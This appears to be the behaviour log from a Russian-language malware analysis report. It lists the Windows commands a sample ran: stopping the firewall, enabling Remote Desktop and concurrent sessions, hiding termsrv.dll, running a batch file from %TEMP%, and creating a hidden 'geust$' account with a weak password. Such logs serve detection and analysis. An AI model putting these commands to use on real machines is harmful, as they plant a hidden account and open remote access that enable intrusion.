Техническая информация
- '<SYSTEM32>\attrib.exe' +H +S +R <SYSTEM32>\termsrv.dll
- '<SYSTEM32>\net.exe' stop sharedaccess
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d <SYSTEM32>\termsrv.dll /f
- '<SYSTEM32>\net1.exe' stop sharedaccess
- '<SYSTEM32>\net1.exe' start termservice
- '<SYSTEM32>\shutdown.exe' -a
- '<SYSTEM32>\net1.exe' start dcomlaunch
- '<SYSTEM32>\svchost.exe' -k DcomLaunch
- '<SYSTEM32>\find.exe' "TermService"
- '<SYSTEM32>\taskkill.exe' /pid 836 /f
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\open.bat" > NUL"
- '<SYSTEM32>\tasklist.exe' /svc
- '<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s geust$ /add
- '<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v geust$ /t "REG_DWORD" /d "0x00000000" /f
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- '<SYSTEM32>\net1.exe' user geust$ 000001 /add
- <SYSTEM32>\svchost.exe
- %TEMP%\open.bat
- %TEMP%\open.bat
- ClassName: '(null)' WindowName: '(null)'